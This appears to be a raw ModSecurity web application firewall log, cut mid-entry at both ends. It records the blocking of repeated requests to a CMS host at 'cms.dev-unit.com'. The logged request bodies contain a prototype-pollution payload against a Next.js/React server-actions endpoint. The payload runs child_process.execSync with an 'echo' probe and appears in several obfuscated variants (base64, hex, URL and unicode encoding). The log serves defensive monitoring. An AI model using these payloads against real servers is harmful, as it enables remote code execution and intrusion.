2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz5c83uMXRUE9zvQTNwAAAdY"] [Sun Apr 05 15:42:39.094578 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:45510] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmz5c83uMXRUE9zvQTOAAAAc0"] [Sun Apr 05 15:42:39.095962 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45486] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqOwAAAQU"] [Sun Apr 05 15:42:39.096363 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:45504] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz7xQSOrq_iRTM7dqPAAAARI"] [Sun Apr 05 15:42:39.096387 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:45508] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz5c83uMXRUE9zvQTOQAAAcU"] [Sun Apr 05 15:42:39.117035 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:45476] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmz5c83uMXRUE9zvQTNgAAAcs"] [Sun Apr 05 15:42:39.129926 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:45490] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmz7xQSOrq_iRTM7dqPQAAAQ0"] [Sun Apr 05 15:42:39.150913 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:45520] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmz7xQSOrq_iRTM7dqOgAAAQI"] [Sun Apr 05 15:42:39.151990 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:45526] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz7xQSOrq_iRTM7dqQAAAAQQ"] [Sun Apr 05 15:42:39.166040 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:45532] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz7xQSOrq_iRTM7dqQQAAARg"] [Sun Apr 05 15:42:39.200758 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:45580] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqQgAAARI"] [Sun Apr 05 15:42:39.200757 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45568] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmz7xQSOrq_iRTM7dqQwAAAQU"] [Sun Apr 05 15:42:39.201635 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:45542] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqRAAAAQ4"] [Sun Apr 05 15:42:39.201974 2026] [:error] [pid 1503:tid 1518] [client 172.94.9.253:45534] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmz0I7AjfUQYCN-J7DwAAAAMk"] [Sun Apr 05 15:42:39.211002 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:45584] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz5c83uMXRUE9zvQTOgAAAcE"] [Sun Apr 05 15:42:39.212377 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:45540] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJmz5c83uMXRUE9zvQTOwAAAdM"] [Sun Apr 05 15:42:39.212650 2026] [:error] [pid 1503:tid 1511] [client 172.94.9.253:45556] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz0I7AjfUQYCN-J7DwQAAAMI"] [Sun Apr 05 15:42:39.235951 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:45590] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmz7xQSOrq_iRTM7dqRQAAAQs"] [Sun Apr 05 15:42:39.239653 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:45606] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmz7xQSOrq_iRTM7dqRgAAARY"] [Sun Apr 05 15:42:39.239679 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:45620] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJmz7xQSOrq_iRTM7dqRwAAAQo"] [Sun Apr 05 15:42:39.273856 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:45634] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 